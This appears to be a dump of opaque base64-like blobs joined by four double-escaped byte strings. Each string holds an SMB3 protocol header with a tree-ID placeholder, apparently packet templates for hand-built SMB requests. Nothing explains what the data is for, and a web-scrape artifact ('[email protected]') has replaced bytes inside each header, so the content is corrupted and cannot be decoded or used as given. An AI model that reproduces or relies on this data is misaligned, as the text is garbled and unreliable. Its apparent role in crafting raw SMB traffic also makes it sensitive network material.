amTKAV2FIj62LcibRoGnLMb/CzXbbGe7wQJvtv1rxJhvFS4ezJr33/dccs9lhUeWuiFwujna6dmmxoLhY1pnsClCbA2Y78t6xPpBEIG58xAwGERiJcvy4LVXIz78LEa4CZSVTJ2CwGRvHeSt5wvJsmd2AtT2EzKV/sFKK3F5LYMlNatBdm+CaFA5w0AVJI+Vd2Sw/hzkowh7ofqSxRJANXC3ljsiLLX9PgJovhmIX3magDl96lQbtyDcQaaFHGj/rCsKbeHNqDmdvwYThu+N5Aceqm/NAko4PN4jCb8ljdyHedc+a0Ll5f2ktVN57n+W4ABgAz6HSHg6LOEQt+cRLksBYG08tx9x5FBZdwcWAbKInPPuFoYy33AS5IEB+S62I7Pvq933d+O6tIjJAFWiRIu6j38+gjk7S40O/lRcLU4AJh9suzHH3Jhv7SWxRunV8WKa+w2zv/kzn1tALCX3S9QXWESW4BL2+uk4AB3C/R21KuG5Pr1D/BpOjgSlIr2fDt7Ull0CBB8F8MAgbxEx7892eVBXvz2Aa3B3Now17ezS8IGgyJFgpUNnTsvFYCJpmu8ZiCou+4Y9PFE2Aq/JP73dKOewZib9zIPfPrjyONiobPbo1bCl/m+TSdhqUh5FYmcxDK9ISe0ElEdgkTOm6Nix8wvPsODOynqdIeS4JkPGwOBxnp678RIFb24/AnQdHhRFPOl2CEJKX+CH1pmztWjhR+6blLrvP/+UKFwewIrG58534tZfUzl2UQtv7ezYAPP3C0vvWzfSfUJpDPOpgbVTvJyI+3r/g0FhmSJaSIWIKiOIh245BAVrrJ/ZkjMSbu57KCiySaIJdi2+ltpquy0TFCfM2kcGju1SPq3SFDLSN/E3I8TO7WWeIA3Qntm5VqlK2bs8zoaIVgcF4tWs3xpdavYegL1N/96CZdqaJMKfY76tApl6VdxB/vvqc+X2l2uqGAPDpefagUipGU/dpIuJBTMluL5OnrYTs3PqAJpoq0154OyHtwvgrab7nhJFZXa/vl4CnWEXhQ3UUvlQHBhVoqSYRqeE/EKiJjaJtKhL3V+a+PQVniOOylW77dGba3F3h/aQJgZ/7+33utKuh+9eSAJdPZlhNQmncsmObaUJRYxGkYz+ShjASOOqH2ev3aT0Zpx4SvbZBcYF/A1yoX8W7lD0CHMIhogHgmauAu1g1DHViPB+qZgx108f1PxpwfKkG\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xb3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xd3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x10sAtu5ElUS2bi3Yd5WEoAwp2mFHnj68bWfzMaw7sk6olzfcvPMAslGoId+Tu9szx42EuHVRv8Ms6OUkyq74Dt98k5Bxlj1nPOQ8Rfhwvwn6RGjv9hWrMxYNXFp+0DZXODL/LKNshne/MoYUMxZ1frwlubyPZwYaLlvEl/p6asISOvFidbCxsIwTm+PRmeA4LUXzPVqbY5J8SLpi5KJ9haG6DggXScAGR4sd3F02/dg8YSyocrLAvhDW27CSh9Occty9bOMqujvJEG+ysDGY6csR/sRAeJun1520gxvvf/zTSAwlJ6p1jk0RlhUfAG5culEBbQX8VKMtg3wsTatTYV86pNMd2L5Wr4FJGLZYKrHWax3TRTmuLID+u1eH6Hf1KY5UQZb4nIzSJlA8g+GDIaoIQYZm21O1siU4P8xRbI+f2Hm62DDJRvnr3YXBvhWablyZNZgstEiPc+JAF0GEFu3OHRXRAJDui5cWNsrGTpa4EBkB0gb8C3WqD/lfMKnG60hcIkvx7x4BOopBqAbvOSA8BWr6LYEWG8TCgOtPGEbNJqZWKKqpp7tKliTO5mLCZnTYMpsGPjg+X02VTw4+Cq13CRy+6Y5aP5c1lX1jkSFnr13FViT63Im1FZgKq5zYg1rFIeU0qqit/VqRBqIjSTV46y9V9Styo8tSzb9jIkOsoNhKfVJN8SQNNxjo13lGMKH3wa7n/MTHW7KwC3fzOaLz4JZRRhcNPvmXOdIgNRFJ5Ff/PoFeXhaSAZ3jAtZwyL5KmCqApPMITm8QvDc8qy3WQLBNgH09Er0RI9L482RGUC+VtrXdsogz9fnsXVLLmsq8myRToNycFNjoUoehk1qjuyAklUJJn+ay0KaPm1Kgxd9olIHGf9jBYg+FVsQFB7RyyBqAG1OeWh6ufdg8BP+yiykftv6H/dZ5wBw8Que09FRiwGyant/HAmfLgih68CMPm9ZTd49oRYmeU0AL3qsa8+27dOX7Pn3N4LvffY